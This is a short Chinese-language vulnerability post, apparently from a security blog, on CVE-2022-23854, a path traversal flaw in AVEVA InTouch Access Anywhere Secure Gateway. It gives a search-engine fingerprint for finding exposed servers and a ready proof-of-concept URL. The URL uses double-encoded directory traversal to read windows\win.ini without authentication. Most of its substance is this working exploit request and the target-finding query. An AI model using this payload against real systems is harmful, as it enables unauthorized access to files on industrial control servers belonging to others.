AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 #CVE-2022-23854

漏洞描述

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞,未授权的攻击者可利用该漏洞获取服务器敏感信息。

漏洞影响

网络测绘

body=”InTouch Access Anywhere”

漏洞复现

登录页面

20240404150013666-png

验证POC

/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini

20240404150048127-png (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容